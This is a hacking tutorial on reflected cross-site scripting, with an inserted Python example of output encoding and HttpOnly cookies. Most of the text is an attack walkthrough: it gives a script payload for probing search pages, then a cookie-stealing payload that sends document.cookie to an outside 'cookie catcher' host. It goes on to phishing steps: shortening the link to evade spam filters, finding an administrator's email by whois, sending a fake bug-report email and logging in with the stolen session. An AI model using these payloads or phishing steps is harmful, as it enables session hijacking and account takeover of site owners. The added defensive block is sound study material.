Types of XSS
There are actually three types of Cross-Site Scripting, commonly named:
- Persistent XSS
- Non-persistent XSS
- DOM-Based XSS
So in this tutorial I will be concentrating on the Non-Persistent method :D
The most common place this kind of vulnerability shows up is in a website's search engine: the attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will render those HTML entities instead of showing them as text.
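As an added, defender-side example (not part of the original tutorial, and written in Python rather than PHP): a minimal model of a search page that echoes the query, the same page with output encoding, a check for whether a script tag survives rendering, and the cookie flag that keeps the session id out of document.cookie. The function names, the sample probe string and the PHPSESSID cookie name are assumptions for illustration.

```python
"""Reflected XSS in a search results page: vulnerable rendering next to its fix.

Added example, not the tutorial's own code. It imitates what a search.php that
echoes the query into the results page does, using Python string rendering.
"""
import re
from html import escape

# Constructed sample input: the kind of probe the tutorial describes typing into
# the search box (a quote to break out of an attribute, then a script tag).
PROBE = '"><script>alert(document.cookie)</script>'


def render_results_vulnerable(query: str) -> str:
    # Echoes the raw query into the HTML. The browser parses the injected
    # <script> element as markup, so the code runs in the site's own origin.
    return f'<p>Results for: {query}</p>'


def render_results_fixed(query: str) -> str:
    # Output encoding: <, >, &, " and ' become entities, so the browser shows
    # the query literally and never sees a tag. Same input, no script element.
    return f'<p>Results for: {escape(query, quote=True)}</p>'


def reflects_script(page: str) -> bool:
    # Check used by a test or scanner: does an executable <script> element
    # survive rendering? For the fixed page this must be False.
    return re.search(r'<script\b', page, re.IGNORECASE) is not None


def session_cookie_header(session_id: str) -> str:
    # Set-Cookie value for the session cookie. HttpOnly keeps it out of
    # document.cookie, so even a script that does run cannot read it;
    # Secure and SameSite limit where the browser sends it.
    return f'PHPSESSID={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/'


def cookie_readable_by_script(set_cookie_value: str) -> bool:
    # Simulates what document.cookie exposes: browsers hide HttpOnly cookies.
    attributes = [part.strip().lower() for part in set_cookie_value.split(';')[1:]]
    return 'httponly' not in attributes


if __name__ == '__main__':
    print('vulnerable page reflects script:', reflects_script(render_results_vulnerable(PROBE)))
    print('fixed page reflects script:', reflects_script(render_results_fixed(PROBE)))
    print('session cookie readable by script:', cookie_readable_by_script(session_cookie_header('abc123')))
```

Together the two fixes address both halves of the attack described on this page: encoding stops the search page from executing the injected markup, and HttpOnly means that even an unpatched page cannot hand the session cookie to document.cookie.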
Finding XSS Vulnerable Sites
First of all, we need to find sites which are vulnerable to XSS attack. There are many such sites.
To find XSS vulnerable sites, add a code after the link. Add the codes given below after the site link to find out whether the site is vulnerable or not:
Or a new one which I found out myself, with which you can inject HTML:
After adding these codes after the link, if your site is http://www.example.com the link to test it would be: http://www.example.com/index.php?id="><script>alert(document.cookie)</script> and now press Enter.
- After finding the site, check for its search box; it must be something like search.php, and now you have to check whether this search.php is vulnerable or not.
- To check this, add this simple code in the search box and click the search button.
- After searching for this code, if a box pops up it means this search.php is vulnerable to a Non-Persistent XSS attack.
- Now, after confirming the vulnerability, add the code below to the URL of this search.php page.
"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
- Now we have to shrink the link of the whole page; for this use tinyurl or any other such service.
- Now try to find the site administrator's e-mail; for this you may use a whois lookup or any online service which gives you the details of the site's owner.
- After getting the email id, send him a fake email from any online fake mailer or through your fake id.
- In the body of the email just say something fake like: Hey, I found a huge bug in your website! and give him the shortened link of the search.php in which you have also added the code.
- Tinyurl will mask the link and won't let it go to spam.
- Once he has clicked on that link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookie catcher.
- No matter what he does, even if he changes his password, you can still log in as him.